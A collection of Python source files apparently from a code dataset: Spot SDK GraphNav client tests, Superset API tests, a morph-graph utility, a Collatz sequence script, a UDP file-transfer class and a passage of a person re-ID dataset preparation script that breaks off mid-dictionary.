MockGraphNavServicer(graph_nav_service_pb2_grpc.GraphNavServiceServicer):\n \"\"\"GraphNav servicer for testing.\n\n Provides simple, controllable implementations of certain RPCs.\n \"\"\"\n\n def __init__(self):\n super(MockGraphNavServicer, self).__init__()\n self.common_header_code = header_pb2.CommonError.CODE_OK\n self.nav_feedback_status = graph_nav_pb2.NavigationFeedbackResponse.STATUS_REACHED_GOAL\n self.modify_navigation_status = graph_nav_pb2.ModifyNavigationResponse.STATUS_OK\n self.nav_to_resp = graph_nav_pb2.NavigateToResponse(\n status=graph_nav_pb2.NavigateToResponse.STATUS_OK)\n self.nav_route_resp = graph_nav_pb2.NavigateRouteResponse(\n status=graph_nav_pb2.NavigateRouteResponse.STATUS_OK)\n self.upload_waypoint_resp = graph_nav_pb2.UploadWaypointSnapshotResponse()\n self.upload_edge_resp = graph_nav_pb2.UploadEdgeSnapshotResponse()\n self.set_loc_resp = graph_nav_pb2.SetLocalizationResponse(\n status=graph_nav_pb2.SetLocalizationResponse.STATUS_OK)\n self.upload_graph_resp = graph_nav_pb2.UploadGraphResponse(\n status=graph_nav_pb2.UploadGraphResponse.STATUS_OK)\n self.download_wp_snapshot_status = graph_nav_pb2.DownloadWaypointSnapshotResponse.STATUS_OK\n self.download_edge_snapshot_status = graph_nav_pb2.DownloadEdgeSnapshotResponse.STATUS_OK\n self.lease_use_result = None\n\n def SetLocalization(self, request, context):\n resp = graph_nav_pb2.SetLocalizationResponse()\n resp.CopyFrom(self.set_loc_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def NavigateRoute(self, request, context):\n resp = graph_nav_pb2.NavigateRouteResponse()\n resp.CopyFrom(self.nav_route_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_results.add().CopyFrom(self.lease_use_result)\n return resp\n\n def NavigateTo(self, request, context):\n resp = graph_nav_pb2.NavigateToResponse()\n resp.CopyFrom(self.nav_to_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_results.add().CopyFrom(self.lease_use_result)\n return resp\n\n def ClearGraph(self, request, context):\n resp = graph_nav_pb2.ClearGraphResponse()\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def UploadGraph(self, request, context):\n resp = graph_nav_pb2.UploadGraphResponse()\n resp.CopyFrom(self.upload_graph_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def UploadWaypointSnapshot(self, request_iterator, context):\n resp = graph_nav_pb2.UploadWaypointSnapshotResponse()\n resp.status = graph_nav_pb2.UploadWaypointSnapshotResponse.STATUS_OK\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def UploadEdgeSnapshot(self, request_iterator, context):\n resp = graph_nav_pb2.UploadEdgeSnapshotResponse()\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def NavigationFeedback(self, request, context):\n \"\"\"Specific NavigationFeedback responses.\"\"\"\n resp = graph_nav_pb2.NavigationFeedbackResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.nav_feedback_status\n return resp\n\n def ModifyNavigation(self, request, context):\n resp = graph_nav_pb2.ModifyNavigationResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.modify_navigation_status\n return resp\n\n def DownloadWaypointSnapshot(self, request, context):\n resp = graph_nav_pb2.DownloadWaypointSnapshotResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.download_wp_snapshot_status\n yield resp\n\n def DownloadEdgeSnapshot(self, request, context):\n resp = graph_nav_pb2.DownloadEdgeSnapshotResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.download_edge_snapshot_status\n yield resp\n\n\n@pytest.fixture\ndef client(time_sync):\n c = GraphNavClient()\n c._timesync_endpoint = time_sync\n return c\n\n\n@pytest.fixture\ndef service():\n return MockGraphNavServicer()\n\n\n@pytest.fixture\ndef time_sync():\n ts = TimeSyncEndpoint(None)\n ts._locked_previous_response = time_sync_pb2.TimeSyncUpdateResponse()\n ts.response.state.status = time_sync_pb2.TimeSyncState.STATUS_OK\n return ts\n\n\n@pytest.fixture\ndef server(client, service):\n server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=1))\n graph_nav_service_pb2_grpc.add_GraphNavServiceServicer_to_server(service, server)\n port = server.add_insecure_port('localhost:0')\n channel = grpc.insecure_channel('localhost:{}'.format(port))\n client.channel = channel\n server.start()\n yield server\n server.stop(0)\n\n\n@pytest.mark.parametrize('func', ('navigation_feedback_async', 'navigation_feedback'))\ndef test_feedback_exceptions(client, service, server, func):\n \"\"\"Client's navigation feedback should provide expected exceptions/responses.\"\"\"\n\n if 'async' in func:\n call = lambda: getattr(client, func)().result()\n else:\n call = getattr(client, func)\n\n # Service starts with valid status codes.\n resp = call()\n assert resp.status == service.nav_feedback_status\n\n # Check every non-unknown status code -- they should all be OK.\n for _, value in graph_nav_pb2.NavigationFeedbackResponse.Status.items():\n # Skip the unset/UNKNOWN value.\n if value == 0:\n continue\n service.nav_feedback_status = value\n assert call().status == value\n\n # UNKNOWN should cause an exception.\n service.nav_feedback_status = graph_nav_pb2.NavigationFeedbackResponse.STATUS_UNKNOWN\n with pytest.raises(UnsetStatusError):\n call()\n\n # Errors in the common header should cause an exception.\n service.common_header_code = header_pb2.CommonError.CODE_INTERNAL_SERVER_ERROR\n with pytest.raises(InternalServerError):\n call()\n\n\n\n\ndef test_navigate_to_exceptions(client, service, server):\n make_call = lambda: client.navigate_to('somewhere-id', 2.0)\n cmd_id = make_call()\n assert type(cmd_id) is int\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n cmd_id = make_call()\n assert type(cmd_id) is int\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_NO_TIMESYNC\n with pytest.raises(bosdyn.client.graph_nav.NoTimeSyncError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_EXPIRED\n with pytest.raises(bosdyn.client.graph_nav.CommandExpiredError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_TOO_DISTANT\n with pytest.raises(bosdyn.client.graph_nav.TooDistantError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_ROBOT_IMPAIRED\n with pytest.raises(bosdyn.client.graph_nav.RobotImpairedError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_RECORDING\n with pytest.raises(bosdyn.client.graph_nav.IsRecordingError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_UNKNOWN_WAYPOINT\n with pytest.raises(bosdyn.client.graph_nav.UnknownWaypointError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_NO_PATH\n with pytest.raises(bosdyn.client.graph_nav.NoPathError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_FEATURE_DESERT\n with pytest.raises(bosdyn.client.graph_nav.FeatureDesertError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_LOST\n with pytest.raises(bosdyn.client.graph_nav.RobotLostError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_NOT_LOCALIZED_TO_MAP\n with pytest.raises(bosdyn.client.graph_nav.RobotNotLocalizedToRouteError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_COULD_NOT_UPDATE_ROUTE\n with pytest.raises(bosdyn.client.graph_nav.RouteNotUpdatingError):\n make_call()\n\n\ndef test_navigate_route_exceptions(client, service, server):\n make_call = lambda: client.navigate_route(nav_pb2.Route(), 2.0)\n cmd_id = make_call()\n assert cmd_id == 0\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n cmd_id = make_call()\n assert type(cmd_id) is int\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_NO_TIMESYNC\n with pytest.raises(bosdyn.client.graph_nav.NoTimeSyncError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_EXPIRED\n with pytest.raises(bosdyn.client.graph_nav.CommandExpiredError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_TOO_DISTANT\n with pytest.raises(bosdyn.client.graph_nav.TooDistantError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_ROBOT_IMPAIRED\n with pytest.raises(bosdyn.client.graph_nav.RobotImpairedError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_RECORDING\n with pytest.raises(bosdyn.client.graph_nav.IsRecordingError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_UNKNOWN_ROUTE_ELEMENTS\n with pytest.raises(bosdyn.client.graph_nav.UnknownRouteElementsError):\n make_call()\n #make sure the misspelled error works for backwards compatibility.\n with pytest.raises(bosdyn.client.graph_nav.UnkownRouteElementsError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_INVALID_EDGE\n with pytest.raises(bosdyn.client.graph_nav.InvalidEdgeError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_CONSTRAINT_FAULT\n with pytest.raises(bosdyn.client.graph_nav.ConstraintFaultError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_FEATURE_DESERT\n with pytest.raises(bosdyn.client.graph_nav.FeatureDesertError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_LOST\n with pytest.raises(bosdyn.client.graph_nav.RobotLostError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_NOT_LOCALIZED_TO_ROUTE\n with pytest.raises(bosdyn.client.graph_nav.RobotNotLocalizedToRouteError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_COULD_NOT_UPDATE_ROUTE\n with pytest.raises(bosdyn.client.graph_nav.RouteNotUpdatingError):\n make_call()\n\n\ndef test_clear_graph(client, service, server):\n make_call = lambda: client.clear_graph()\n\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n\ndef test_upload_graph_exceptions(client, service, server):\n make_call = lambda: client.upload_graph(graph=map_pb2.Graph())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n make_call()\n\n service.upload_graph_resp.status = service.upload_graph_resp.STATUS_MAP_TOO_LARGE_LICENSE\n with pytest.raises(bosdyn.client.graph_nav.MapTooLargeLicenseError):\n make_call()\n\n service.upload_graph_resp.status = service.upload_graph_resp.STATUS_INVALID_GRAPH\n with pytest.raises(bosdyn.client.graph_nav.InvalidGraphError):\n make_call()\n\n\ndef test_upload_waypoint_exceptions(client, service, server):\n make_call = lambda: client.upload_waypoint_snapshot(map_pb2.WaypointSnapshot())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n\ndef test_upload_edge_exceptions(client, service, server):\n make_call = lambda: client.upload_edge_snapshot(map_pb2.EdgeSnapshot())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n\ndef test_set_localization_exceptions(client, service, server):\n make_call = lambda: client.set_localization(nav_pb2.Localization())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_ROBOT_IMPAIRED\n with pytest.raises(bosdyn.client.graph_nav.RobotFaultedError):\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_UNKNOWN_WAYPOINT\n with pytest.raises(bosdyn.client.graph_nav.UnknownMapInformationError):\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_ABORTED\n with pytest.raises(bosdyn.client.graph_nav.RequestAbortedError):\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_FAILED\n with pytest.raises(bosdyn.client.graph_nav.RequestFailedError):\n make_call()\n\n\ndef test_download_waypoint_snapshot(client, service, server):\n make_call = lambda: client.download_waypoint_snapshot(waypoint_snapshot_id=\"mywaypoint\")\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_INTERNAL_SERVER_ERROR\n with pytest.raises(InternalServerError):\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_OK\n service.download_wp_snapshot_status = graph_nav_pb2.DownloadWaypointSnapshotResponse.STATUS_SNAPSHOT_DOES_NOT_EXIST\n with pytest.raises(bosdyn.client.graph_nav.UnknownMapInformationError):\n make_call()\n\n\ndef test_download_edge_snapshot(client, service, server):\n make_call = lambda: client.download_edge_snapshot(edge_snapshot_id=\"myedge\")\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_INTERNAL_SERVER_ERROR\n with pytest.raises(InternalServerError):\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_OK\n service.download_edge_snapshot_status = graph_nav_pb2.DownloadEdgeSnapshotResponse.STATUS_SNAPSHOT_DOES_NOT_EXIST\n with pytest.raises(bosdyn.client.graph_nav.UnknownMapInformationError):\n make_call()\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/tests/test_graph_nav_client.py","file_name":"test_graph_nav_client.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"25168416315","text":"import json\nimport prison\n\nfrom superset.utils.core import get_example_default_schema\n\nfrom tests.integration_tests.utils.get_dashboards import get_dashboards_ids\nfrom unittest import mock\nfrom sqlalchemy import Column\nfrom typing import Any\nfrom superset.advanced_data_type.types import (\n AdvancedDataType,\n AdvancedDataTypeRequest,\n AdvancedDataTypeResponse,\n)\nfrom superset.utils.core import FilterOperator, FilterStringOperators\n\n\ntarget_resp: AdvancedDataTypeResponse = {\n \"values\": [],\n \"error_message\": \"\",\n \"display_value\": \"\",\n \"valid_filter_operators\": [\n FilterStringOperators.EQUALS,\n FilterStringOperators.GREATER_THAN_OR_EQUAL,\n FilterStringOperators.GREATER_THAN,\n FilterStringOperators.IN,\n FilterStringOperators.LESS_THAN,\n FilterStringOperators.LESS_THAN_OR_EQUAL,\n ],\n}\n\n\ndef translation_func(req: AdvancedDataTypeRequest) -> AdvancedDataTypeResponse:\n return target_resp\n\n\ndef translate_filter_func(col: Column, op: FilterOperator, values: list[Any]):\n pass\n\n\ntest_type: AdvancedDataType = AdvancedDataType(\n verbose_name=\"type\",\n valid_data_types=[\"int\"],\n translate_type=translation_func,\n description=\"\",\n translate_filter=translate_filter_func,\n)\n\nCHART_DATA_URI = \"api/v1/chart/advanced_data_type\"\nCHARTS_FIXTURE_COUNT = 10\n\n\n@mock.patch(\n \"superset.advanced_data_type.api.ADVANCED_DATA_TYPES\",\n {\"type\": 1},\n)\ndef test_types_type_request(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test to see if the API call returns all the valid advanced data types\n \"\"\"\n uri = f\"api/v1/advanced_data_type/types\"\n response_value = test_client.get(uri)\n data = json.loads(response_value.data.decode(\"utf-8\"))\n assert response_value.status_code == 200\n assert data == {\"result\": [\"type\"]}\n\n\ndef test_types_convert_bad_request_no_vals(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when no values are passed\n \"\"\"\n arguments = {\"type\": \"type\", \"values\": []}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 400\n\n\ndef test_types_convert_bad_request_no_type(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when no type is passed\n \"\"\"\n arguments = {\"type\": \"\", \"values\": [1]}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 400\n\n\n@mock.patch(\n \"superset.advanced_data_type.api.ADVANCED_DATA_TYPES\",\n {\"type\": 1},\n)\ndef test_types_convert_bad_request_type_not_found(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when passed in type is\n not found/not valid\n \"\"\"\n arguments = {\"type\": \"not_found\", \"values\": [1]}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 400\n\n\n@mock.patch(\n \"superset.advanced_data_type.api.ADVANCED_DATA_TYPES\",\n {\"type\": test_type},\n)\ndef test_types_convert_request(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when a valid type\n and valid values are passed in\n \"\"\"\n arguments = {\"type\": \"type\", \"values\": [1]}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 200\n data = json.loads(response_value.data.decode(\"utf-8\"))\n assert data == {\"result\": target_resp}\n","repo_name":"apache/superset","sub_path":"tests/integration_tests/advanced_data_type/api_tests.py","file_name":"api_tests.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"17204262367","text":"from contextlib import contextmanager\nfrom itertools import pairwise\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Any, BinaryIO, Iterable, Iterator\n\nimport networkx as nx\n\nfrom .._magic import MediumSpec\nfrom ..errors import PilusMissingMorpherError\nfrom ._morph import Morpher, MorphFunc, ShapeSpec\n\n\nclass MorphGraph:\n \"\"\"Graph of available morphs.\"\"\"\n\n def __init__(self) -> None:\n # Nodes are of type: `ShapeSpec`\n # Edges are of type: `MorphFunc`\n self._graph = nx.DiGraph()\n\n def add_morpher(self, morpher: Morpher) -> None:\n \"\"\"Add nodes and edge that corresponds the given morpher to this graph.\n\n Removes the existing edge (if any).\n \"\"\"\n # Remove existing edge (if any)\n try:\n self._graph.remove_edge(morpher.input, morpher.output)\n except nx.NetworkXError:\n pass\n # Add new edge\n self._graph.add_edge(morpher.input, morpher.output, func=morpher.func)\n # Generate edges\n if isinstance(morpher.input, MediumSpec):\n self._generate_edges_to_medium_spec(morpher.input)\n\n def _generate_edges_to_medium_spec(self, spec: MediumSpec) -> None:\n if spec.raw_type is BinaryIO:\n path_to_io = Morpher(\n input=MediumSpec(raw_type=PathLike, media_type=spec.media_type),\n output=spec,\n func=_file_to_io,\n )\n self._add_morpher_if_not_exists(path_to_io)\n elif spec.raw_type is bytes:\n path_to_io = Morpher(\n input=MediumSpec(raw_type=PathLike, media_type=spec.media_type),\n output=MediumSpec(raw_type=BinaryIO, media_type=spec.media_type),\n func=_file_to_io,\n )\n self._add_morpher_if_not_exists(path_to_io)\n io_to_data = Morpher(\n input=MediumSpec(raw_type=BinaryIO, media_type=spec.media_type),\n output=MediumSpec(raw_type=bytes, media_type=spec.media_type),\n func=_io_to_data,\n )\n self._add_morpher_if_not_exists(io_to_data)\n\n def _add_morpher_if_not_exists(self, morpher: Morpher) -> None:\n # Early out if the edge already exists\n try:\n self._graph[morpher.input][morpher.output]\n except KeyError:\n pass\n else:\n return\n # Add new edge\n self._graph.add_edge(morpher.input, morpher.output, func=morpher.func)\n\n def get_morphs(\n self, in_spec: ShapeSpec, out_spec: ShapeSpec\n ) -> Iterator[MorphFunc]:\n \"\"\"Return morph functions that morphs `in_spec` into `out_spec`.\"\"\"\n # We find the shortest sequence of morphs that takes\n # us from the source type into the destination type.\n try:\n path: list[Any] = nx.shortest_path(self._graph, in_spec, out_spec)\n except nx.NodeNotFound as exc:\n raise PilusMissingMorpherError(\n f'Can not find morph chain that converts from \"{in_spec}\" to'\n f' \"{out_spec}\"'\n ) from exc\n return self._path_to_morph_funcs(path)\n\n def _path_to_morph_funcs(self, path: Iterable[Any]) -> Iterator[MorphFunc]:\n for edge in pairwise(path):\n yield self._graph[edge[0]][edge[1]][\"func\"]\n\n def spec_to_type(self, spec: ShapeSpec) -> type:\n try:\n for edge in nx.dfs_edges(self._graph, spec):\n target_node = edge[1]\n if not isinstance(target_node, MediumSpec):\n assert isinstance(target_node, type)\n return target_node\n except KeyError:\n pass\n raise ValueError(\n \"Could not find type that corresponds to the given shape specification\"\n )\n\n\n@contextmanager\ndef _file_to_io(file: Path) -> Iterator[BinaryIO]:\n with file.open(\"rb\") as io:\n yield io\n\n\ndef _io_to_data(io: BinaryIO) -> bytes:\n return io.read()\n","repo_name":"sbtinstruments/pilus","sub_path":"pilus/forge/_morph_graph.py","file_name":"_morph_graph.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3596598782","text":"import time\r\nimport webbrowser\r\n\r\ngreeting = input(\"Welcome to the 3x + 1 (or Collatz Conjecture) number generator.\\nFor a start, do you know what is the Collatz Conjecture? (Yes/No) \")\r\nif greeting.upper() == \"YES\":\r\n print(\"Great! Let's continue!\")\r\nelif greeting.upper() == \"NO\":\r\n webbrowser.open(\"https://en.wikipedia.org/wiki/Collatz_conjecture\")\r\n time.sleep(3)\r\n print(\"Have you understood? Let's continue!\")\r\nelse:\r\n print(\"Invalid input. Sorry!\")\r\nx = int(input(\"Enter the starting number: \"))\r\ndelay = input(\"Enter the delay time between numbers (in seconds): \")\r\nhighestnumber = 0\r\nruntime = 0\r\nhighestnumbertime = 0\r\n\r\nprint(str(x))\r\nwhile x != 1:\r\n if x > highestnumber:\r\n highestnumber = x\r\n highestnumbertime = runtime\r\n if x % 2 == 0:\r\n x = x / 2\r\n else:\r\n x = 3 * x + 1\r\n print(str(int(x)))\r\n runtime += 1\r\n time.sleep(float(delay))\r\n\r\nprint(\"The highest number was \" + str(int(highestnumber)) + \". It was reached at number \" + str(int(highestnumbertime) + 1) + \".\")\r\nprint(str(int(runtime) + 1) + \" numbers were generated until the number reached 1, including 1.\")\r\n","repo_name":"jiaqichen2010/math-programs","sub_path":"3x+1 generator.py","file_name":"3x+1 generator.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39207270827","text":"from socket import *\nfrom os import listdir\n\nclass Udp:\n def __init__(self, opcao, port = None):\n self.port = port\n self.control = socket(AF_INET, SOCK_DGRAM)\n if opcao == 'server' and port != None:\n self.control.bind(('', self.port))\n self.control.settimeout(5.0)\n\n self.report = 'FINISH'\n\n def receber(self, bytes = None):\n tentativa = 0\n mensagem = None\n endereco = ('0', 0)\n while tentativa < 3 and mensagem == None:\n try:\n mensagem, endereco = self.control.recvfrom(2048)\n if bytes == None:\n mensagem = mensagem.decode()\n print(f\"RECEBENDO MENSAGEM {mensagem}\")\n self.control.sendto(b\"ACK 0\", endereco)\n print(f\"ENVIANDO ACK 0\")\n else:\n resposta = \"ACK \" + str(bytes + len(mensagem))\n print(f\"RECEBENDO {resposta}\")\n self.control.sendto(resposta.encode(), endereco)\n except:\n tentativa += 1\n return (mensagem, ) + endereco\n\n def responder(self, mensagem, endereco, bytes = None):\n resultado = \"FAIL\"\n tentativa = 0\n while resultado == \"FAIL\" and tentativa < 3:\n try:\n if bytes == None:\n print(f\"ENVIANDO MENSAGEM {mensagem}\")\n self.control.sendto(mensagem.encode(), endereco)\n else:\n print(f\"ENVIANDO PARTE ARQUIVO\")\n self.control.sendto(mensagem, endereco)\n mensagem, address = self.control.recvfrom(2048)\n resultado, ack = mensagem.decode().split()\n print(f\"RECEBENDO {resultado} {ack}\")\n if resultado == \"ACK\" and endereco == address and (bytes == None or ack == bytes):\n resultado = 'FINISH'\n else:\n tentativa += 1\n except:\n tentativa += 1\n return resultado\n \n def enviarPasta(self, pasta, destino):\n self.report = \"FINISH\"\n try:\n nomes = listdir(pasta)\n for arquivo in nomes:\n self.responder(\"NAME \"+pasta+\"/\"+arquivo, destino)\n self.enviarArquivo(pasta+\"/\"+arquivo, destino)\n if self.report.split()[0] != \"FINISH\":\n break\n except:\n if self.report.split()[0] != \"FAIL\":\n self.report = \"FAIL FOLDER\"\n finally:\n self.responder(\"CLOSE CONN\", destino)\n\n def enviarArquivo(self, path, destino):\n self.report = \"FINISH\"\n ack = 0\n try:\n arquivo = open(path, 'rb')\n except:\n self.report = \"FAIL FILE\"\n\n if self.report == \"FINISH\":\n try:\n parte = arquivo.read(2048)\n ack += len(parte)\n while parte:\n ack = self.responder(parte, destino, str(ack))\n if ack != \"FAIL\":\n parte = arquivo.read(2048)\n else:\n parte = False\n self.report = \"FAIL SEND\"\n self.responder(\"CLOSE CONN\", destino)\n except:\n self.report = \"FAIL SEND\"\n finally:\n arquivo.close()\n\n def receberArquivo(self, nome):\n ack = 0\n arquivo = open(nome, \"wb\")\n try:\n parte, ip, port = self.receber(ack)\n while parte != b\"CLOSE CONN\":\n arquivo.write(parte)\n ack += len(parte)\n parte, ip, port = self.receber(ack)\n self.report = \"FINISH\"\n except:\n self.report = \"FAIL SEND\"\n\n def getReport(self): return self.report\n","repo_name":"JDaniloC/Projeto-IF678-2019","sub_path":"Utils/UDP.py","file_name":"UDP.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21183135578","text":"import os\nfrom shutil import copyfile\nimport argparse\nimport shutil\n\ndownload_path = \"./raw-dataset/DukeMTMC-reID/\"\n\nparser = argparse.ArgumentParser(description='prepare')\nparser.add_argument('--Market', action='store_true', help='prepare dataset market1501')\nparser.add_argument('--Duke', action='store_true', help='prepare dataset Duke-MTMC')\nopt = parser.parse_args()\n\nif not os.path.isdir(download_path):\n print('please change the download_path')\n\nif opt.Market:\n save_path = \"./dataset/Market1501_prepare/\"\nelse:\n save_path = \"./dataset/DukeMTMC_prepare/\"\n\nif not os.path.exists(save_path):\n os.makedirs(save_path)\n# -----------------------------------------\n# query\nquery_path = download_path + '/query'\nquery_save_path = save_path + '/query'\nif not os.path.exists(query_save_path):\n os.makedirs(query_save_path)\n\nfor root, dirs, files in os.walk(query_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = query_path + '/' + name\n dst_path = query_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n# -----------------------------------------\n# gallery\ngallery_path = download_path + '/bounding_box_test'\ngallery_save_path = save_path + '/gallery'\nif not os.path.exists(gallery_save_path):\n os.makedirs(gallery_save_path)\n\nfor root, dirs, files in os.walk(gallery_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = gallery_path + '/' + name\n dst_path = gallery_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n# ---------------------------------------\n# train_all\ntrain_path = download_path + '/bounding_box_train'\ntrain_save_path = save_path + '/train_all'\nif not os.path.exists(train_save_path):\n os.makedirs(train_save_path)\n\nfor root, dirs, files in os.walk(train_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = train_path + '/' + name\n dst_path = train_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n# ---------------------------------------\n# train_val\ntrain_path = download_path + '/bounding_box_train'\ntrain_save_path = save_path + '/train'\nval_save_path = save_path + '/val'\nif not os.path.exists(train_save_path):\n os.makedirs(train_save_path)\n os.makedirs(val_save_path)\n\nfor root, dirs, files in os.walk(train_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = train_path + '/' + name\n dst_path = train_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n dst_path = val_save_path + '/' + ID[0] # first image is used as val image\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n\n# ================================================================================================\n# market1501_rename\n# ================================================================================================\n\ndef parse_frame(imgname, dict_cam_seq_max={}):\n dict_cam_seq_max = {\n 11: 72681, 12: 74546, 13: 74881, 14: 74661, 15: 74891, 16: 54346, 17: 0, 18: 0,\n 21: 163691, 22: 164677, 23: 98102, 24: 0, 25: 0, 26: 0, 27: 0, 28: 0,\n 31: 161708, 32: 161769, 33: 104469, 34: 0, 35: 0, 36: 0, 